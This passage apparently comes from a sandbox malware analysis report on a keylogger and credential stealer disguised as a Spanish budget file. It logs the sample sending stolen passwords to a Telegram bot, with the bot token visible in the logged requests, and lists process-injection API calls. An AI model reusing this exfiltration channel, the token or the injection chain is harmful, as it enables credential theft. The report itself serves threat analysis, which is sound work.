{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BLmb4Yy3KU25Bo5asUB5rtSuDW%2BnzYQPSgQ0CaNHMforEeJqYSUiUm8ZE0%2Fn2SosaWv1pVJjLpNM83xDLQkjpCOWwY%2F1ALjCpcNiNe%2Bsg26W%2BwHwqjzn3%2FXA3EtK0FFjj2P1jTKg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2a7dabbab6bfb-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1163&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2460492&cwnd=251&unsent_bytes=0&cid=d5878ebbc38b64ad&ts=144&x=0"
2024-10-31 09:35:33 UTC	147	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionN
2024-10-31 09:35:33 UTC	212	IN	Data Raw: 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: ame>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.11	49877	149.154.167.220	443	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:35:34 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2001/11/2024%20/%2001:21:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-31 09:35:34 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 31 Oct 2024 09:35:34 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-31 09:35:34 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.11	49913	149.154.167.220	443	7336	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:35:41 UTC	344	OUT	POST /bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendDocument?chat_id=8178506397&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcfa7be7f62c54 Host: api.telegram.org Content-Length: 578
2024-10-31 09:35:41 UTC	578	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 61 37 62 65 37 66 36 32 63 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 74 6f 74 74 69 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 30 33 33 38 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 33 31 2f 31 30 2f 32 30 32 34 20 2f 20 30 35 3a 33 35 3a 30 31 0d Data Ascii: --------------------------8dcfa7be7f62c54Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:103386Date and Time: 31/10/2024 / 05:35:01
2024-10-31 09:35:42 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 31 Oct 2024 09:35:41 GMT Content-Type: application/json Content-Length: 512 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-31 09:35:42 UTC	512	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 38 33 32 31 38 35 32 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 68 6f 6e 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 68 6f 6e 65 31 32 34 35 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 38 31 37 38 35 30 36 33 39 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 64 38 33 64 5c 75 64 65 32 39 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 50 61 72 6b 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 30 33 36 37 33 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a Data Ascii: {"ok":true,"result":{"message_id":572,"from":{"id":7783218527,"is_bot":true,"first_name":"Phone","username":"Phone1245bot"},"chat":{"id":8178506397,"first_name":"\ud83d\ude29","last_name":"Park","type":"private"},"date":1730367341,"document":{"file_name":

Target ID:	2
Start time:	05:34:59
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe"
Imagebase:	0xba0000
File size:	815'104 bytes
MD5 hash:	4CF66DE9BFDF5BB65B4151F456DB83DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:35:01
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe"
Imagebase:	0xe00000
File size:	815'104 bytes
MD5 hash:	4CF66DE9BFDF5BB65B4151F456DB83DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.6%
Total number of Nodes:	222
Total number of Limit Nodes:	12

Executed Functions

Function 07810E28 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a03d2625317b26f073d8b7e70b76f9fed0d726f6a456e1c2a204c8d682c8791c
Instruction ID: d6c2f29ee953b132d141e5375fd1c20f5ab403fd1d607295d364c4f423293ae9
Opcode Fuzzy Hash: a03d2625317b26f073d8b7e70b76f9fed0d726f6a456e1c2a204c8d682c8791c
Instruction Fuzzy Hash: 174281B4E01219CFDB64CFA9C984B9DBBF6BF48310F1481A9E809A7355D734AA81CF50

Function 01504204 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1313398111.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1500000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e481d9a62291c6e944b2e25f98c57f4e2069a8ffd63a40689364101b294d4a98
Instruction ID: e93647745d0c9fe14119c03a29c1ee990c55d8331ee907cc078a48e24a376c84
Opcode Fuzzy Hash: e481d9a62291c6e944b2e25f98c57f4e2069a8ffd63a40689364101b294d4a98
Instruction Fuzzy Hash: 2DA1A274E0020DDFDB05DFA9D994AADBBB2FF88300F148529E509AB368DB356945CF50

Function 01507018 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1313398111.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1500000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a2c365fd4035e593d2e6273f41b2b40163247c474e7afb19e8d92e5972bf02b
Instruction ID: 977bc56ac1780305d4a237806051f8343780974a0efb9e556050b352fac2fd68
Opcode Fuzzy Hash: 9a2c365fd4035e593d2e6273f41b2b40163247c474e7afb19e8d92e5972bf02b
Instruction Fuzzy Hash: 08A1B174E00309EFDB05DFA9D994AADBBB2FF88300F148569E509AB368DB356945CF40

Function 07810E21 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 434358b5a1f1f96076cc3bb024dbef94f43c55c8e924203c0143dcdcbcaf20ef
Instruction ID: 92fd0b334f18a7edfa2b156038140b5f500324d07819679572d6190c454c07a4
Opcode Fuzzy Hash: 434358b5a1f1f96076cc3bb024dbef94f43c55c8e924203c0143dcdcbcaf20ef
Instruction Fuzzy Hash: 2461C4B4E01218CFDB58CFAAD995B9DBBF2BF88310F1481A9D809A7394D7359981CF50

Function 07817AF1 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 563f9b6d6a86c93ebef6866cb570c38bbd3cba58aae9fd83e492b37f7e97d363
Instruction ID: 69ccced0f517d79184ad30ad20e61656503ed93ace4ff4ec9f6650cc9a7d9919
Opcode Fuzzy Hash: 563f9b6d6a86c93ebef6866cb570c38bbd3cba58aae9fd83e492b37f7e97d363
Instruction Fuzzy Hash: B621E4B1D056189BEB18CFABDD053DEBFB6AFC9310F04C16AD408A6264DB7409458FA1

Function 0781EBF7 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e5731ddb3a5bae492fa43aa41eb64dd5a2a5d72dbf5f0a1b54614df8dd84494
Instruction ID: 842a3d110bbcfd611921452177545f75c9a4862a7eed25e675f4f46a12cd62ac
Opcode Fuzzy Hash: 5e5731ddb3a5bae492fa43aa41eb64dd5a2a5d72dbf5f0a1b54614df8dd84494
Instruction Fuzzy Hash: DC11D7B481925CCFCB60CF64D448BF8BBB8BB2A316F4450E6D90EE2291C7348A85CF10

Function 0781D795 Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0781D9D6

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: eed755ae726406a72baa8ed8b1e1e2d5a0e0c85b30a5d3e0459e264affc3e108
Instruction ID: 3bf6915bc226ad2d15b69245ae28bcc06015b61e59cc144642cf65d83165e6ef
Opcode Fuzzy Hash: eed755ae726406a72baa8ed8b1e1e2d5a0e0c85b30a5d3e0459e264affc3e108
Instruction Fuzzy Hash: 9F917DB1E0061ACFDB10DFA9C841BDDBBB6BF48314F1485A9D848E7290DB749985CFA1

Function 0781D7A0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0781D9D6

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8fcc14fae00c39487dd9a5da302e27bbf2371d64dafab6b2e55631cd6a6b8a74
Instruction ID: 2723d1c1d24c185072357ae6f25f91ffe5a0a2449c428219b56f0361c86fb5df
Opcode Fuzzy Hash: 8fcc14fae00c39487dd9a5da302e27bbf2371d64dafab6b2e55631cd6a6b8a74
Instruction Fuzzy Hash: 0A916DB1E0061ACFDB10DF69C841BEDBBB6BF48314F1485A9D849E7280DB749985CFA1

Function 0150B33A Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0150B59E

Memory Dump Source

Source File: 00000002.00000002.1313398111.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1500000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c5404879f579b750f672ef4d6cc9bb28ccc4a1accaec0c55b2261518b862adab
Instruction ID: 031d150d8461442c04e6feb46bfe850e745c4e40fd7efd72769a3946cede4de4
Opcode Fuzzy Hash: c5404879f579b750f672ef4d6cc9bb28ccc4a1accaec0c55b2261518b862adab
Instruction Fuzzy Hash: 05813674A00B058FD725DF69D49479ABBF2FF88300F148A2DD446DBA90E735E949CB90

Function 01504560 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 01505DC9

Memory Dump Source

Source File: 00000002.00000002.1313398111.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1500000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6fdcc10ed6ee3513ea52b4c17493baddc1479ae0647557718a8f01f4ca449510
Instruction ID: 313dee21a7bcc1370ff51de61e31deaa7e4429bca857396f17f0d59cdb391dbd
Opcode Fuzzy Hash: 6fdcc10ed6ee3513ea52b4c17493baddc1479ae0647557718a8f01f4ca449510
Instruction Fuzzy Hash: 4541E1B0C0061DCBDB25DFA9C844BCDBBB5BF49304F60846AD408AB255DB715945CF90

Function 01505D0C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 01505DC9

Memory Dump Source

Source File: 00000002.00000002.1313398111.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1500000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 5868a86f326e1392d52168fcbf9c1361bdee73272f0170ef3cccb8902ff04722
Instruction ID: 44dba7be1e2fd7eff947f164caf79000759faa10926763873667593c387651f9
Opcode Fuzzy Hash: 5868a86f326e1392d52168fcbf9c1361bdee73272f0170ef3cccb8902ff04722
Instruction Fuzzy Hash: A141E0B1C00619CEDB25DFA9C844BDEBBF5BF49304F60806AD408AB264DB715945CF90

Function 0781D511 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0781D5A8

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3b1297fe1c8197148a11c15421e3385b1b1e0ca9b02ee039560cb3e8729d8329
Instruction ID: 04de4d469f151cdea0e59b8567ec998f15b5de4ae646a040887ecf295d018658
Opcode Fuzzy Hash: 3b1297fe1c8197148a11c15421e3385b1b1e0ca9b02ee039560cb3e8729d8329
Instruction Fuzzy Hash: F42144B19003599FDB10DFA9C885BDEBBF5FF48310F10842AE918A7240D7799944CBA0

Function 0781D518 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0781D5A8

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8841b5eabb535a1fe7ed1ebc86e0cbca4590105d23dde60020be4d52ec2db158
Instruction ID: abee9685d2e5c88561a1c41931170a2b19732ec353a3dd3dd231bd190d5b3d07
Opcode Fuzzy Hash: 8841b5eabb535a1fe7ed1ebc86e0cbca4590105d23dde60020be4d52ec2db158
Instruction Fuzzy Hash: E62136B1D003599FCB10DFA9C985BDEBBF5FF48314F10842AE919A7250D7799944CBA0

Function 0781D378 Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0781D3FE

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 9575bd25c6b00d82887faede186d70d48dd10353de753af59770651ea7849ac7
Instruction ID: f66b0cb9afd9a8288f559977d8f531ffb3e78eb3bf77158d70f32aeac75c157b
Opcode Fuzzy Hash: 9575bd25c6b00d82887faede186d70d48dd10353de753af59770651ea7849ac7
Instruction Fuzzy Hash: FA2168B1D003099FDB10DFAAC8857EEBBF8AF48324F10842AD419A7241D778A945CFA0

Function 0150B234 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0150D7EE,?,?,?,?,?), ref: 0150D8AF

Memory Dump Source

Source File: 00000002.00000002.1313398111.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1500000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 94200c601c506a908b0c88db49eec22473061a63bcfcd8878927bf4281576098
Instruction ID: df017e85c392ebd833b9914ae93918979f36fcf6f91ff8d0d57a340788b12783
Opcode Fuzzy Hash: 94200c601c506a908b0c88db49eec22473061a63bcfcd8878927bf4281576098
Instruction Fuzzy Hash: 0F21B5B5D00248DFDB10CF99D584ADEBBF5FB48310F14845AE918A7350D374A954CFA5

Function 0781D601 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0781D688

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: c042db7cabf731525c81697e43b6569022e06342981d4bdf0dc37b416e8f2840
Instruction ID: 2849b22fce93647738a8104f953023042c6ee07cc987b71389933cf60cb33371
Opcode Fuzzy Hash: c042db7cabf731525c81697e43b6569022e06342981d4bdf0dc37b416e8f2840
Instruction Fuzzy Hash: 082136B1D007499FDB10DFA9C880ADEBBF5FF48310F10842AE918A7240D7799904CFA0

Function 0150D820 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0150D7EE,?,?,?,?,?), ref: 0150D8AF

Memory Dump Source

Source File: 00000002.00000002.1313398111.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1500000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 85593d238c7a8311ee2245b1901cbdea15ed96806ff765d0ef596c7bf343ddd3
Instruction ID: e3df33985e881e7aaef0c1081f1887c1f39619ac5a1b4e72f987928833dcd52b
Opcode Fuzzy Hash: 85593d238c7a8311ee2245b1901cbdea15ed96806ff765d0ef596c7bf343ddd3
Instruction Fuzzy Hash: 7421D2B5900248AFDB10CFAAD985ADEBFF8FF48310F14841AE918A7350D374A944CFA0

Function 0781D608 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0781D688

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 65e5497a96426e6902659d87c0be041aca4e13f40863f0a4a8932418514327a2
Instruction ID: 1febb4381e3abc7d254e963a6de9943acc7ea55ff7c5411e8540d19d4a0ccbed
Opcode Fuzzy Hash: 65e5497a96426e6902659d87c0be041aca4e13f40863f0a4a8932418514327a2
Instruction Fuzzy Hash: 3A2125B1D003599FCB10DFAAC885AEEFBF5FF48310F50842AE919A7250D7799945CBA0

Function 0781D380 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0781D3FE

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7af6cdfcc7b84ce3ffe07d2b856510ce09d84b59ab342da5ae629e25d2f048c8
Instruction ID: 6be19809e99040ae1676a71553e94bec4b05a84da98120c62b856a48ef6e3c63
Opcode Fuzzy Hash: 7af6cdfcc7b84ce3ffe07d2b856510ce09d84b59ab342da5ae629e25d2f048c8
Instruction Fuzzy Hash: 162147B1D003098FDB10DFAAC4857EEBBF8EF48324F10842AD419A7240DB78A945CFA0

Function 0781D450 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0781D4C6

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

